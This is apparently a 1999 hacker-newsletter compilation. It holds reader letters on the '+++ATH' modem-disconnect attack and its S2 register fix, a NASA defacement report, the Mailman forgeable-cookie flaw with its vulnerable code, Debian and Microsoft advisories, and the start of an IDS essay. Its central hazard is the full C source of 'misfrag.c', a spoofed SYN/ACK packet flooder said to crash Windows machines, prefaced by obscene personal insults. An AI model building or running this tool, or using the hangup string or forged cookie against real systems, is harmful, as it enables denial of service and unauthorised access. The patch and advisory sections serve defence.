Massimo Valle's solution of adding S2=127 to the modem init string works great.
I tested it twice by removing the string and re-sending the + + + A T H command to myself email...kicked right off immediately.
Replaced the sequence in the init string, sent again, nothing at all happened, it sent normally.
Thanks Massimo!!
Matt Perkins
Michigan USA
Date: Thu, 24 Jun 1999 01:46:31 -0400
Subject: modem flaw -- followup
From: "Jason Y. Kim"
Confirmed! Setting S2 register to 128 (manual says anything ABOVE 127 will work) fixed the modem problem on my iMac. I can now send
email to myself with the modem hangup command in the subject line and body without getting immediately disconnected. And I can still
disconnect manually whenever I want.
THANK YOU MACINTOUCH.
--argonaut
Date: Thu, 24 Jun 1999 12:38:24 -0400
Subject: iMac Modem Security Fix ready for download
From: "Chris Dembitz"
To: Ric Ford
I have modified the two iMac modem scripts with the suggested modification of adding S2=128 to the init string. I made an Applescript
installer that will replace the older versions with these (unsupported) modified versions. It is available at [imacscriptupdate.sit] It is in Stuffit 5
format. Please note this is an unsupported, unwarranteed fix. Hope this helps
--
Christopher J. Dembitz
General Manager
NetRamp Internet Services, Inc.
Tidewater, Virginia's Only All-Mac ISP
Date: Fri, 25 Jun 1999 10:24:56 -0400
Subject: Update to script update
From: "Chris Dembitz"
I have updated the iMac script update installer so it now gives the option to reinstall the old scripts (since those were getting copied over
without being backed up). The url to download it has not changed.
Chris
Date: Thu, 24 Jun 1999 22:30:56 -0400
From: Cristian
Subject: Quick Guide: Solving Modem Bug (DoS)
Hi Ric! Thanks for such a good followup on the Modem Bug...
After spending an hour trying to understand what exactly should be done on my Internal Apple 56k modem (350 BW G3) to fix the problem, I
concluded:
5 easy steps:
1.Get offline!
2.Launch Zterm (or similar terminal program)
3.Type ATZ enter (resets modem to default settings)
4.Type ATS2=128 enter (sets S2 register to 128, disabling escape sequence)
5.Type AT&W&W1 enter (stores the new settings to default)
Now, to verify this worked, switch your modem off/on (or shutdown if internal). Open Zterm, type ATZ enter and then type AT&V enter. This
will display your default settings. You want S2 (or S02) to be equal to 128. You'd probably read: S02:128
-Cristian Viola.
Date: Thu, 24 Jun 1999 11:48:32 -0700
From: Jim Stoneburner
Subject: Modem workaround problems; Hangup delay solution
Hello,
(1) Modem flaw workaround causes problems
I tried some of the recommended workarounds and found that it made my modem unusable _depending_ on which modem script I use.
My modem is a Global Village Modem x2 56k external, on a PowerCenter running OS 7.6.1 and OT/PPP 1.0.1. I have two modem scripts
for ARA 2.1/OT-PPP on hand, two different generations of x2 scripts from Global Village.
The version 1.0.9 script worked great after I added "S2=127" to the init string (just after "S0=0"), solving the undesired disconnects if I try to
send an email containing "+ + + ATHO".
However, version 1.0.7 would not work. When trying to dial, the menubar "speedometer" would show data burst at 2 or 3 per second, and the
process would stall. Sometimes, a restart was required to escape the process. I tried this with "S2=128", and in different places in the string
of AT commands, but no luck.
(2) Hangup delays: a possible solution
Normally, I would simply use the newer script, especially since it functions with the "S2=127" workaround. However, the older script
disconnects _much_ faster than the new one -- 2 seconds as opposed to 10. I don't understand enough about these scripts to tell why the
earlier version doesn't work with the modification, or why it disconnects more rapidly. Being an experimental scientist, I tried a few things....
First, I read the scripts and identified the few differences between them. I then did some experimentation by commenting out or swapping out
code. This narrowed down the cause of slow disconnects to a section near the end of the script labeled "Hang up and reset the modem."
(The init string made no difference, by the way.) The revision list at the top of the v1.0.9 script includes the entry:
! 1.0.8 06/11/97 GAS Fixed hang up code and added TIES support
So, I tried replacing the subsection in v1.0.9 labeled
Escape from data to command mode using TIES + + + AT\13 command
with one from the older v1.0.7 script labeled:
Escape from data to command mode using standard + + + command.
This eliminated most of the hangup delays. Restoring the newer code, I then experimented with simply shortening the "pause" statements in
this section, but this was not enough to noticably shorten the delay.
Perhaps one of your readers can help us understand the benefits of the newer code (if any), and how to speed up the disconnects now that a
major cause has been identified. I'd also be interested in whether other readers can confirm these observations. At present, I am stuck either
with the newer script with its slow disconnects but a successful workaround to the defect, or the older script with its fast disconnects but no
workaround.
Best wishes,
Jim
Attachment 1: Hang up code from v1.0.9 of Global Village x2 script
! Escape from data to command mode using TIES + + + AT\13 command
!
pause 60
write "+++"
pause 30
matchclr
matchstr 1 96 "OK\13\10"
pause 15
write "AT\13"
matchread 60
!
@LABEL 94
! Force a hangup
matchclr
matchstr 1 98 "NO CARRIER\13\10"
matchstr 2 98 "OK\13\10"
matchstr 3 98 "ERROR\13\10"
matchstr 4 98 "0\13\10"
matchstr 5 98 "DELAYED"
matchstr 6 98 "BLACKLISTED"
write "ATH\13"
matchread 30
!
! Try again to get control of the modem by toggling DTR
!
DTRClear
Pause 5
DTRSet
flush
!
!
! Try the hangup sequence three times otherwise declare an error
inctries
pause 120
iftries 3 101
jump 91
!
@LABEL 96
! Pause between data and command mode
pause 50
jump 94
!
!
@LABEL 98
pause 15
matchclr
matchstr 1 99 "OK\13\10"
write "AT&F1E1\13"
matchread 30
jump 101
!
@LABEL 99
exit 0
!
!
Attachment 2: Hangup code from v1.0.7 of "GV x2 for ARA 2.1/OT-PPP"
! ---- Hang up and reset modem ----
!
@HANGUP
!
! If we do this too long, exit.
iftries 1225 99
!
@LABEL 90
!
settries 0
HSReset 0 0 0 0 0 0
!
@LABEL 91
!
! Try to get control of the modem
!
DTRClear
Pause 5
DTRSet
flush
!
@LABEL 94
!
! Force a hangup
!
matchclr
matchstr 1 98 "NO CARRIER\13\10"
matchstr 2 98 "OK\13\10"
matchstr 3 98 "ERROR\13\10"
matchstr 4 98 "0\13\10"
matchstr 5 98 "DELAYED"
matchstr 6 98 "BLACKLISTED"
write "ATH\13"
matchread 30
!
! Try again to get control of the modem by toggling DTR
!
@LABEL 95
DTRClear
Pause 5
DTRSet
flush
!
!
! Escape from data to command mode using standard +++ command
!
matchclr
matchstr 1 96 "OK\13\10"
pause 15
write "+++"
matchread 15
!
!
! Try the hangup sequence three times otherwise declare an error
!
inctries
iftries 3 101
jump 95
!
@LABEL 96
!
! Pause between data and command mode
!
pause 50
jump 94
!
!
@LABEL 97
!
! AT&F1 resulted in Error, try again using AT&F
!
pause 15
matchclr
matchstr 1 99 "OK\13\10"
write "AT&FS0=0\13"
matchread 30
jump 101
!
@LABEL 98
!
! Got control of the modem. Recall the factory settings. If it fails,
jump 97.
!
pause 15
matchclr
matchstr 1 99 "OK\13\10"
matchstr 2 97 "ERROR\13\10"
write "AT&F1S0=0\13"
matchread 30
jump 101
!
@LABEL 99
exit 0
!
!
Date: Fri, 25 Jun 1999 07:58:28 -0400
Subject: Modem Security flaw
From: Steve Crossman
Hi Ric,
I just wanted to say that the S2=127 added to the initialization string of my modem in my G3-233 Wallstreet PowerBook has fixed the
problem you had described. I also don't get knocked offline anymore, which was so frequent that I thought I had a bad modem or phone line.
It is hard to believe GV & Apple could engineer something like this into the PB with this kind of problem. Thanks to your page for the fix.
Steve Crossman
Date: Thu, 24 Jun 1999 21:05:59 -0400
From: M J McCaffrey
Subject: GV 56K + + + ATH fix script
Ric--
I have successfully modified the "PowerBook G3 Internal 56K" ARA connect script to implement the S2 register setting described by several
readers as a "fix" for the guard-time attack.
I have tested it on my own system (a PowerBook G3 Series/250 with the 56K internal modem) both with the original script and the modified
script, and am satisfied it fixes the problem. (I tested by sending an e-mail to myself with the problem string in the body of the message --
sure enough, with the original I'm knocked offline immediately, and with the modified script it's no longer a problem.)
I have posted the script at the following URL:
/modemFix/index.html
The script itself is about a 40K download.
Please consider making this available to your readers in your next edition. Thanks!
--Matt McCaffrey
PS: I have had this problem since I started using my internal modem on 56K lines, and it has bugged the living daylights out of me. Thank you
for helping get the word out! (And as always, thanks for MacInTouch!)
Date: Fri, 25 Jun 1999 17:38:02 -0700
From: Kent Sorensen
Subject: Snak version 3.0.1 is released - IRC Client for Mac
Dear Editor,
Snak is a full featured IRC client with some unique and very useful features. It's fast, efficient and easy to use, and it is being updated and
enhanced regularly.
Version 3.0.1 has now been released and can be downloaded from [www.snak.com]
This version blocks the so-called ATH attack from disconnecting your modem via IRC. The attack uses a flaw in some modems to cause it
to disconnect, by sending it a particular string of text. This string is now stopped and changed, so the modem will not react to it. ...
From: Mitchell Burnside Clapp
Date: Fri, 25 Jun 1999 13:17:31 EDT
Subject: Modem Guard Mode/Security defect: Fix for AOL users
For AOL users, the modem script in the system folder is apparently never called. The AOL client does its own modem configuration.
To implement the S2=128 fix discussed on MacInTouch, you need to select the setup button from your sign on screen. Select the "Expert
Setup", "Edit," "Modem Options," and "Advanced settings" buttons in order. Type the characters "S2=128" at the end of the string of letters in
the "Configuration" box. Save your way back out to the sign on screen. (You may be asked to save the modem settings as a copy under a
new name. I called mine "GV Internal modem 56K fix" and double-checked to make sure it was selected as the modem for the location I
was editing).
I was able to send myself e-mail containing the infamous "+ + + A T H" sequence without getting dropped, whereas before it was a reliable
way of kicking me off-line every time.
Mitchell Burnside Clapp
CEO
Pioneer Rocketplane
Background Information
From: "Wong,Robert
Subject: modem guard problem
Date: Thu, 24 Jun 1999 10:35:53 -0700
Hi,
A long time ago, I used to administer the ZyXEL modem FAQ. One of the questions was about how the ZyXEL modems dealt with the
modem guard sequence. If you read onwards, you will notice an excerpt from BoardWatch mag. This exerpt describes how ZyXEL got
around the Hayes patent. RWW.
Subject: T.6 How do ZyXEL modems deal with escape sequences?
Byte Magazine, V18, N8, July 1993, pg 184 has a good background article about escape sequences. The information below is a
less technical explanation of escape sequences.
An escape sequence switches a modem from transmission mode to command mode.
Sometimes, an AT command needs to be issued to the modem when it is on-line and connected with another modem. Since the
modem is on-line, typing an AT command would send the AT command down the connection to the other modem. Thus the
local modem never receives and acts on the AT command. An escape sequence is needed to bring the local modem into
command mode (without dropping the connection to the other modem).
One escape sequence is to drop the DTR (Data Terminal Ready) signal on one of the wires in the serial cable. This is a reliable
escape sequence. Some hardware platforms do not have a wire for the DTR signal and therefore cannot perform this escape
sequence. Another type of escape sequence is needed.
An alternate escape sequence is a pause, followed by three escape characters, and then another pause. This escape sequence
then puts the modem into command mode, allowing entry of AT commands. (The pauses prevent the modem from mistaking
escape characters in the data stream for "true" escape characters in an escape sequence.)
Hayes has a patent on the pause, escape characters, and pause technique. Other modem manufacturers are required to pay
royalties to Hayes for use of its patent. Some modem makers are not using the Hayes patent or any other method of
distinguishing real escape characters. This causes factory configured modems from these modem manufacturers to
inadvertently go into command mode when the Hayes test file is transmitted.
Taken from Byte Magazine, V18, N8, July 1993, pg 184 without permission:
"Zyxel [sic] has its own algorithm, for which it claims compatibility with existing code. Since the Zyxel [sic] algorithm is
proprietary, we can't comment on its strength or weakness. However, it caused no problem in our testing."
Taken from BoardWatch Magazine, V6, N9, November 1992 without permission:
"To illustrate the technical elegance of this [ZyXEL] modem, recall our article on the Hayes brouhaha over their fixed guard
time escape sequence under the Heatherington 302 patent. Hayes has licensed numerous modem manufacturers to use this
escape sequence. A few have not licensed it and often, their modems will escape to command mode while transmitting files
containing +++ escape sequences. Hayes caused something of a furor in July by releasing a text file that if transmitted by many
modems that don't use the guard time escape sequence technique, would abort the transfer and improperly escape to command
mode. Multitech's modems fail the test rather awkwardly. The ZyXEL modem does NOT license the Hayes escape sequence.
According to Gordon Yang, they use a proprietary variable sampling algorithm that does the job at least as well. We tried the
ZyXEL on the Hayes test file - and sure enough, it worked like a champ. ZyXEL appears to have engineered a way around the
escape sequence controversy. Yang indicates that they could conceivably publish the algorithm. If they did, this would take
some serious steam out of the Hayes licensing program."
Robert Wong
O'Reilly's dictionary of data communications terms includes a discussion of escape guard systems under "TIES" - Time Independent Escape
Sequence
100.0 Another government server cracked today
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 26th
From www.403-security.org
Another NASA site got hacked
Astral 26.06.1999 22:25
Today another NASA site was hacked today it is http://microgravity.msfc.nasa.gov/ this time. Keebler, he hacked
all this government sites in last few weeks. This is just another hacked site in a serial of government website
hacks. Check archive of this hack in Hacked Sites section.
http://www.403-security.org/Htmls/hacked_sites.htm
@HWA
101.0 MailMan.cookie attack
~~~~~~~~~~~~~~~~~~~~~
June 26th from PacketStorm Security
http://www.python.org/pipermail/mailman-developers/1999-June/001128.html
John Morton jwm@plain.co.nz
Thu, 10 Jun 1999 18:14:42 +1200 (NZST)
[Didn't see this problem discussed in the recent archive messages, so...]
I was looking at the code for the admin cgi in search of a good cookie
authentication system, and found out that it was doing this,
c = Cookie.Cookie( os.environ['HTTP_COOKIE'] )
if c.has_key(list_name + "-admin"):
if c[list_name + "-admin"].value == `hash(list_name)`:
return 1
...to authenticate based on a cookie. This code is from 1.0b8, but it
only took a couple of minutes to set the appropriate wafer in my
junkbuster configuration, and point netscape at the admin page for
mailman-developers. I'll leave the replication of this exploit as an
exercise for the readers.
Possible solutions:
Lock down that url with whatever security features your web server
has. This sucks as a long term solution, but it should protect from
disgruntled script kiddies that you just chucked off your lists.
Make the value based on a hash of some slow changing system
variable. Something that changes with the frequency of your desired
expire time, for example. Maybe a cron job to set a key based on some
fast changing system stats every hour or so.
Use SSL for the admin interface and save the name and password in the
cookie.
Any better suggestions?
John.
---------------------------------------------------------------------------
Date: Tue, 22 Jun 1999 21:06:34 -0700
From: debian-security-announce@LISTS.DEBIAN.ORG
Reply-To: security@debian.org
Subject: [SECURITY] New versions of mailman fixes cookie attack
-----BEGIN PGP SIGNED MESSAGE-----
We have become aware that the version mailman as supplied in Debian
GNU/Linux 2.1 has a problem with verifying list administrators. The
problem is that the cookie value generation used was predictable, so
using forged authentication cookies it was possible to access the
list administration webpages without knowing the proper password.
More information about this vulnerability can be found at
http://www.python.org/pipermail/mailman-developers/1999-June/001128.html
This has been fixed in version 1.0rc2-5.
We recommend you upgrade your mailman package immediately.
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
Debian GNU/Linux 2.1 alias slink
- --------------------------------
This version of Debian was released only for Intel, the Motorola
680x0, the alpha and the Sun sparc architecture.
Source archives:
http://security.debian.org/dists/stable/updates/binary-source/mailman_1.0rc2-5.diff.gz
MD5 checksum: 096d96ebf89341b148d2ae917037559a
http://security.debian.org/dists/stable/updates/binary-source/mailman_1.0rc2-5.dsc
MD5 checksum: a407c72b6d80163b04ddc5fb895b8fbd
http://security.debian.org/dists/stable/updates/binary-source/mailman_1.0rc2.orig.tar.gz
MD5 checksum: 6916959db9144ecaf004fcd9be32a020
Alpha architecture:
http://security.debian.org/dists/stable/updates/binary-alpha/mailman_1.0rc2-5_alpha.deb
MD5 checksum: 0f053b62d9dd51d4e2c0843258eee453
Intel ia32 architecture:
http://security.debian.org/dists/stable/updates/binary-i386/mailman_1.0rc2-5_i386.deb
MD5 checksum: d9b0f93458a41055ba1b39891e0a5ca5
Motorola 680x0 architecture:
http://security.debian.org/dists/stable/updates/binary-m68k/mailman_1.0rc2-5_m68k.deb
MD5 checksum: 94fc7996e4b296a4c944fe08ccb44503
Sun Sparc architecture:
http://security.debian.org/dists/stable/updates/binary-sparc/mailman_1.0rc2-5_sparc.deb
MD5 checksum: e27d100b24d0c87c02cc86b7aadded0d
These files will be copied into
ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon.
Please note you can also use apt to always get the latest security
updates. To do so add the following line to /etc/apt/sources.list:
deb http://security.debian.org/ stable updates
- --
Debian GNU/Linux . Security Managers . security@debian.org
debian-security-announce@lists.debian.org
Christian Hudon . Wichert Akkerman . Martin Schulze
. .
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
iQB1AwUBN3Av9KjZR/ntlUftAQFFjwL/VwNslEzha3yT4k3wwDSedm0XEiHIUCS1
+ngWFIrPnLzfJ/jK2atXAZc98wwFxjxOTDWnGuc4RBjRi4NqBduQsVwaIHelSbK2
u9uPiNvzUhPiCUdzDusjy8ysUmzJIHd8
=PgQB
-----END PGP SIGNATURE-----
--
To UNSUBSCRIBE, email to debian-security-announce-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
@HWA
102.0 misfrag.c nasty piece of code from P.A.T.C.H
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/******** ***** ********* ***** * *
* * * * * * * * * *
******** * *** * * * * *** *
* * * * * * *
* [*] * * [*] * [*] ****** [*] * * [*]
P e o p l e A l l - f o r t o o l s c a u s i n g h e l l
*/
/*********************************************************************
*
* P.A.T.C.H.
* t h e b r i g a d e
* [http://thebrigade.8m.com]
*
* coded by misteri0 from P.A.T.C.H.
* [mailto:leet@ibw.com.ni]
*
* Description: [ Sends 2 packets per packet that you give out ]
* [ and per every packet it increments the dest/source port by 1 ]
* [ the packets are spoofed, and it sends 1 packet using TH_SYN and another with TH_ACK ]
* [ crashes operating systems: Windows NT4 / Win95 / Win98 ]
* [ crashed a Windows NT4 / Win95 / Win98 from my computer sending 2000 packets starting from 0 ports ]
* greets: codesearc, Nforcer, Punk182, everyone in #ehforce, Evilfurby, ^clAw^
* people in #bitchx, folks in #c, and the lame people in #nicaragua for being such dicks
* with me which if it wasn't for them I would not have decided to code
* fuck u's: Ellison you stupid cocksucking piece of shit son-of-a-bitch, I wish you nothing but pain.
* Nsurfer~1 for being the lamest BO user ever
* the fuckheads in #trenchcoatmafia (hey code you remember how they fell like rocks?? :-))
*******************************************************************************************************/
/*--------- code ----------- */
#define _BSD_SOURCE
/* BSD compatibility */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct pseudo {
u_long saddr;
u_long daddr;
u_char zero;
u_char protocol;
u_short length;
};
unsigned short
in_cksum (unsigned short *ptr, int nbytes)
{
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
/*
* Our algorithm is simple, using a 32-bit accumulator (sum),
* we add sequential 16-bit words to it, and at the end, fold back
* all the carry bits from the top 16 bits into the lower 16 bits.
*/
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
/* mop up an odd byte, if necessary */
if (nbytes == 1)
{
oddbyte = 0; /* make sure top half is zero */
*((u_char *) & oddbyte) = *(u_char *) ptr; /* one byte only */
sum += oddbyte;
}
/*
* Add back carry outs from top 16 bits to low 16 bits.
*/
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return (answer);
}
int sendpack( int s, u_long srcaddr, u_short srcport, u_long dstaddr, u_short dstport,u_short th_flags, u_char *packet,u_long length) {
u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)];
struct sockaddr_in foo;
struct in_addr srcinaddr,dstinaddr;
struct ip *ip = (struct ip *) packet;
struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip));
struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip)
+ sizeof(struct pseudo));
bzero(packet, sizeof(packet));
bzero(&foo,sizeof(foo));
/* only BSD, linux has plain u_long declared */
srcinaddr.s_addr = srcaddr;
dstinaddr.s_addr = dstaddr;
/* building packets */
pseudo->saddr = srcaddr;
pseudo->daddr = dstaddr;
pseudo->zero = 0;
pseudo->protocol=IPPROTO_TCP;
pseudo->length = htons(sizeof (struct tcphdr));
ip->ip_v = 4; /* 4 */
ip->ip_hl = 5; /* 5 */
ip->ip_id = 1234; /* 1234 */
ip->ip_src = srcinaddr;
ip->ip_dst = dstinaddr;
ip->ip_p = IPPROTO_TCP;
ip->ip_ttl = 40; /* 40 */
ip->ip_off = 0;
ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr)
+ length;
tcp->th_sport = htons(srcport);
tcp->th_dport = htons(dstport);
tcp->th_seq = htonl(rand());
tcp->th_ack = htonl(rand());
tcp->th_off=1;
tcp->th_flags = th_flags;
tcp->th_urp = 0; /* 0 */
tcp->th_sum = in_cksum((u_short *) pseudo,
sizeof(struct pseudo) +
sizeof(struct tcphdr));
bcopy(tcp,pseudo,sizeof(struct tcphdr));
foo.sin_family=AF_INET;
foo.sin_addr.s_addr=dstaddr;
sendto(s,packet,sizeof(struct ip) +
sizeof(struct tcphdr) + length, 0,
(struct sockaddr *) &foo,sizeof(foo));
return 0;
}
void usage(char *name) {
fprintf(stderr,"\x1B[0;34mP.A.T.C.H. production - misteri0\x1B[0;0m\n");
fprintf(stderr,"\x1B[1;36mUsage: \x1B[0;31m%s \x1B[1;32m[\x1B[0;36msrcip\x1B[1;32m] \x1B[1;32m[\x1B[0;36msrc start port\x1B[1;32m] \x1B[1;32m[\x1B[0;36mdstip\x1B[1;32m] \x1B[1;32m[\x1B[0;36mdst start port\x1B[1;32m] \x1B[1;32m[\x1B[0;36mcount\x1B[1;32m]\x1B[0;0m\n",name);
fprintf(stderr,"\x1B[0;35mNote: \x1B[0;33mThe source/destination ports will increment by 1\x1B[0;0m\n");
exit(1);
}
u_long resolve_name(char *hostname) {
struct hostent *host;
u_long addr;
if ((addr = inet_addr(hostname)) != -1) return addr;
if ((host = gethostbyname(hostname)) == NULL) {
fprintf(stderr,"Can not resolve name: %s\n",hostname);
exit(1);
}
bcopy(host->h_addr,&addr,host->h_length);
return addr;
}
int main(argc,argv)
int argc;
char **argv;
{
int rawfd,rd,rsize;
int count; /* don't know why I made it so complicated, *sigh* oh well, gets the job done.. */
int one=1;
u_char buf[1024];
struct sockaddr_in raddr;
struct ifreq ifr;
struct in_addr srcip,dstip;
u_short srcport,dstport;
if (argc!=6) usage(argv[0]);
srcip.s_addr = resolve_name(argv[1]);
srcport = atoi(argv[2]);
dstip.s_addr = resolve_name(argv[3]);
dstport = atoi(argv[4]);
if ((rawfd=socket(PF_INET,SOCK_RAW,IPPROTO_ICMP))<0) {
perror("RawSocket:");
exit(1);
}
if (setsockopt(rawfd,IPPROTO_IP,IP_HDRINCL,&one,sizeof(one))<0) {
perror("SetSockOpt:");
close(rawfd);
exit(1);
}
count=0;
while(atoi(argv[5]) > count)
{
count++;
printf("sending packet from: %s:%i ",inet_ntoa(srcip),srcport);
printf("to %s:%i\n",inet_ntoa(dstip),dstport);
/* think about it, =-) */
srcport = srcport + 1;
dstport = dstport + 1;
sendpack(rawfd,srcip.s_addr,srcport,dstip.s_addr,dstport,TH_SYN,NULL,0);
sendpack(rawfd,srcip.s_addr,srcport,dstip.s_addr,dstport,TH_ACK,NULL,0);
usleep(1000);
}
/* printf("starting..");
for(;;) {
printf("foo..");
fflush(stdout);
if ((rd=recvfrom(rawfd,buf,1024,0,(struct sockaddr *)&raddr,&rsize))<0) break;
printf("%i\n",rd);
}*/
close(rawfd);
return(0);
}
103.0 Double-byte code vulnerability, MS Security Bulletin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 25 Jun 1999 10:18:46 -0700
From: aleph1@UNDERGROUND.ORG
To: BUGTRAQ@netspace.org
Subject: Microsoft Security Bulletin (MS99-022)
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Microsoft Security Bulletin (MS99-022)
--------------------------------------
Patch Available for "Double Byte Code Page" Vulnerability
Originally Posted: June 24, 1999
Summary
=======
Microsoft has released a patch that eliminates a vulnerability in
Microsoft(r) Internet Information Server that could allow a web site
visitor to view the source code for selected files on the server, if the
server's default language is set to Chinese, Japanese or Korean.
Frequently asked questions regarding this vulnerability can be found
at http://www.microsoft.com/security/bulletins/MS99-022faq.asp
Issue
=====
When IIS is run on a machine on which a double-byte character set code page
is used (i.e., the default language on the server is set to Chinese,
Japanese, or Korean), and a specific URL construction is used to request a
file in a virtual directory, normal server-side processing is bypassed. As
a result, the file is simply delivered as text to the browser, thereby
allowing the source code to be viewed.
Affected Software Versions
==========================
- Microsoft Internet Information Server 3.0 and 4.0, if run on a server
whose default language is set to Chinese, Korean, or Japanese
Patch Availability
==================
- English: ftp://ftp.microsoft.com/bussys/iis/iis-public/
fixes/usa/security/fesrc-fix
- Simplified Chinese: ftp://ftp.microsoft.com/bussys/iis/iis-public/
fixes/chs/security/fesrc-fix
- Traditional Chinese: ftp://ftp.microsoft.com/bussys/iis/iis-public/
fixes/cht/security/fesrc-fix
- Japanese: ftp://ftp.microsoft.com/bussys/iis/iis-public/
fixes/jpn/security/fesrc-fix
- Korean: ftp://ftp.microsoft.com/bussys/iis/iis-public/
fixes/kor/security/fesrc-fix
NOTE: Line breaks have inserted into the above URLs for readability
NOTE: Apply the patch corresponding to the language version of IIS, rather
than the current default language on the server. For example, if you have
the English version of IIS but have reset the default language on the
server to Chinese, apply the English patch.
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-022: Frequently Asked Questions,
http://www.microsoft.com/security/bulletins/MS99-022faq.asp.
- Microsoft Knowledge Base (KB) article Q233335,
"Page Contents Visible When Certain Characters are at End of URL",
http://support.microsoft.com/support/kb/articles/q233/3/35.asp.
(Note: It may take 24 hours from the original posting of this bulletin
for the KB article to be visible; however, a copy will be immediately
available in the patch folder)
- Microsoft Security Advisor web site,
http://www.microsoft.com/security/default.asp.
- IIS Security Checklist,
http://www.microsoft.com/security/products/iis/CheckList.asp.
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Technical Support is available at
http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- June 24, 1999: Bulletin Created.
-------------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/services/bulletin.asp. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
--------------------------------------------------------------------------------
Date: Fri, 25 Jun 1999 17:33:22 -0400
From: Russ
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Alert: Microsoft Security Bulletin (MS99-022) - Double Byte Code Page Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Ok, Microsoft released this one yesterday and I needed to get a little
clarification before I sent it on to you.
Basically, we have an unknown vulnerability against IIS on NT boxes
that have chosen an "Input Locale" of Chinese, Korean, or Japanese.
These languages all use a double-byte code page set to represent the
language characters. A "munged" URL can fool such an IIS server into
providing the source for the page instead of the display (similar to
the way ::$DATA worked).
So, if you're like me, you're wondering a couple of things;
Q: How do I know I might be affected by this?
A: If you got a version of NT for any language other than Chinese,
Korean, or Japanese, then you would had to have installed the "Far
East Language Pack" to make these languages available on your machine.
Then, assuming you did install this pack, you would have to have gone
into Control Panel/Regional Settings/Input Locale, and actually chosen
one of them as your default language. If you haven't done this, be not
afraid.
The other way is if you got a Chinese, Korean, or Japanese version of
NT and have left the Input Locale to that language (or have chosen one
of the other languages). If, however, you have chose, e.g. EN
(English), then you're not susceptible.
Confused yet?
Of course it also goes without saying that you have to be running IIS
on this box too.
Q: What is the attack?
A: Wouldn't we all like to know. This one is internally discovered by
MS, so we don't have any details of what exactly is the vulnerability
(other than knowing you're subject to the vulnerability using the
products described above).
Good show for MS telling us about the patch, we'll see if they can
come clean on some level of detail of the actual exploit...would
really show how much the MS Security approach has changed, wouldn't
it...;-]
MS99-022 FAQ
http://www.microsoft.com/security/bulletins/MS99-022faq.asp
Patches at
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
English: usa/security/fesrc-fix
Simplified Chinese: chs/security/fesrc-fix
Traditional Chinese: cht/security/fesrc-fix
Japanese: jpn/security/fesrc-fix
Korean: kor/security/fesrc-fix
Sorry for the delay in bringing you this rather sparse amount of
additional info.
Cheers,
Russ - NTBugtraq Editor
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2
iQA/AwUBN3P1o8+Ua7J6A+woEQIb/wCgkaPzuN3yAPxsbdSSYAatsZkGgiUAoI+O
eDCaxqG/VC+pDg1q0mdLwTLN
=F7rQ
-----END PGP SIGNATURE-----
104.0 50 Ways to defeat your IDS
~~~~~~~~~~~~~~~~~~~~~~~~~~
By Fred Cohen
Managing Network Security
50 Ways to Defeat
Your Intrusion Detection System
by
Fred Cohen of Fred Cohen & Associates (fc@all.net) http://all.net/
Series Introduction
Over the last several years, computing has changed to an almost purely networked environment, but the technical aspects of
information protection have not kept up. As a result, the success of information security programs has increasingly become a
function of our ability to make prudent management decisions about organizational activities. Managing Network Security takes a
management view of protection and seeks to reconcile the need for security with the limitations of technology.
Background and Introduction:
This article is based on a short piece I wrote a few weeks ago on an airplane on the way back from the National Computer
Security Center / National Institute of Science and Technology conference.
I was one of 12 speakers on a panel discussion about how to protect networks when the style of computing involves loading
untrusted executable programs from over the Internet into network browsers running on computers inside the firewall. At some
